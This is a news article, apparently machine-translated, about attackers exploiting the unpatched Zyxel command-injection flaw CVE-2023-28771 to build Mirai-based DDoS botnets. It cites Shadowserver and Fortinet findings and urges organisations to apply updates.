many Zyxel network devices are still running old software and are subject to cyberattacks

Zyxel network devices that have not been updated since a critical vulnerability was discovered in April have become a prime target for hackers who use them to create botnets and carry out DDoS– attacks.

Vulnerability that received an ID CVE-2023-28771 , allows attackers to execute arbitrary code on Zyxel devices using a specially crafted IKEv2 package. It affects firewalls and VPN– Zyxel servers with default settings. On April 25, Zyxel released a patch for this vulnerability, but many organizations still haven’t updated their devices.

At the end of May the organization shadowserverwhich monitors Internet threats in real time, warned that many Zyxel devices have been compromised in attacks that continue to this day. Shadowserver recommended that all vulnerable devices be considered infected.

Company last week Fortinet published own research , in which she reported on a sharp increase in the activity of attacks carried out by various hacker groups in recent weeks. Most of the attacks are based on variants of Mirai, a program for finding and exploiting common vulnerabilities in routers and other IoT devices. Once successfully exploited, Mirai combines devices into botnets that can carry out large-scale DDoS attacks.

Meanwhile, PoC–exploit for vulnerable devices, Zyxel was published by researchers back in early June in order to somehow spur owners of this network equipment to update their devices. But that plan doesn’t seem to work, judging by the sheer number of devices still affected.

“Since the exploit module was published, there has been a constant surge of malicious activity. The analysis carried out FortiGuard Labs, showed a significant increase in the number of attacks since May. We also identified several botnets, including Mirai-based Dark.IoT and another botnetwhich uses specialized DDoS attack methods,” security researcher Kara Lin said in a Fortinet report.

Lin specifically noted that over the past month, attacks using CVE-2023-28771 have been detected from various IP addresses and specifically target the ability to inject commands in the Internet Key Exchange packet transmitted by Zyxel devices. Attacks were carried out using tools such as curl And wgetwhich downloaded malicious scripts from servers controlled by hackers.

In addition to Dark.IoT, other botnet programs that use vulnerabilityincluded Rapperbot And Katana.

Given the ability to execute exploits directly on vulnerable devices, one could assume that affected organizations have long since patched this vulnerability. But alas, the ongoing successful attempts at exploitation demonstrate that a considerable number of companies, for some reason, have not yet done so.

“The presence of known vulnerabilities in corporate devices can lead to serious risks. Once attackers gain control of a vulnerable device, they can include it in their botnet, which will allow them to carry out various types of attacks, such as DDoS,” Lin said.

The Fortinet expert also added that it is extremely important for organizations to prioritize correctly and pay more attention to security. You need to install updates and patches regularly, otherwise the entire internal infrastructure of the company will be under the threat of a hacker attack.